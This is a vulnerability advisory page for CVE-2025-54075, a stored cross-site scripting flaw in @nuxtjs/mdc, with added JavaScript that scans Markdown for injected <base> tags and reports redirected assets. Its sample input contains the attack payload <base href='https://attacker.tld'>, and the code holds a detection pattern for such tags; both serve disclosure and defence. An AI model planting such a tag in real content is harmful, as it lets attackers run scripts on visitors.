CVE-2025-54075 Information

Description

MDC is a tool to take regular Markdown and write documents interacting deeply with a Vue component. Prior to version 0.17.2, a remote script-inclusion / stored cross-site scripting vulnerability in @nuxtjs/mdc lets a Markdown author inject a <base href="https://attacker.tld"> element. The <base> tag rewrites how all subsequent relative URLs are resolved, so an attacker can make the page load scripts, styles, or images from an external, attacker-controlled origin and execute arbitrary JavaScript in the site’s context. Version 0.17.2 contains a fix for the issue.
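For sites that cannot upgrade immediately, stored Markdown can be audited for raw <base> elements before it is rendered. The following is an added example, not code from @nuxtjs/mdc or its fix; the page URL, asset paths and function names are assumptions made for illustration.

```javascript
// Added example, not @nuxtjs/mdc code. Coarse audit: it also flags <base>
// shown inside Markdown code spans, which a reviewer can dismiss by hand.
const BASE_TAG = /<base\b[^>]*>/gi;
const HREF_ATTR = /\bhref\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/i;

// Return every raw <base> tag in the Markdown with its line number and href.
function findBaseTags(markdown) {
  const findings = [];
  for (const m of markdown.matchAll(BASE_TAG)) {
    const href = HREF_ATTR.exec(m[0]);
    findings.push({
      line: markdown.slice(0, m.index).split("\n").length,
      tag: m[0],
      href: href ? (href[1] ?? href[2] ?? href[3]) : null,
    });
  }
  return findings;
}

// Resolve a relative URL as a browser would: against <base href> when one
// is present, otherwise against the page URL.
function effectiveUrl(relative, pageUrl, baseHref) {
  const base = baseHref ? new URL(baseHref, pageUrl) : new URL(pageUrl);
  return new URL(relative, base).href;
}

// Report the tags found and which of the page's relative assets would leave
// the page's origin. Browsers honour only the first <base> that has an href.
function auditDocument(markdown, pageUrl, relativeAssets) {
  const tags = findBaseTags(markdown);
  const first = tags.find((t) => t.href !== null);
  const pageOrigin = new URL(pageUrl).origin;
  const redirected = !first ? [] : relativeAssets
    .map((a) => effectiveUrl(a, pageUrl, first.href))
    .filter((u) => new URL(u).origin !== pageOrigin);
  return { tags, redirected };
}

// Constructed sample input (page URL and asset paths are hypothetical).
const PAGE_URL = "https://docs.example/guide/intro";
const ASSETS = ["/_nuxt/entry.js", "img/logo.png"];
const SAMPLE_MD = '# Title\n\nSome text.\n\n<base href="https://attacker.tld">\n\n![logo](img/logo.png)\n';

console.log(auditDocument(SAMPLE_MD, PAGE_URL, ASSETS));
```

Path-absolute URLs such as /_nuxt/entry.js are redirected as well as path-relative ones, because both are resolved against the base URL.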

Reference

https://github.com/nuxt-modules/mdc/commit/3657a5bf2326a73cd3d906f57149146a412b962a
https://github.com/nuxt-modules/mdc/security/advisories/GHSA-cj6r-rrr9-fg82

CNNVD-202507-2444 (Published: 2025-07-18)
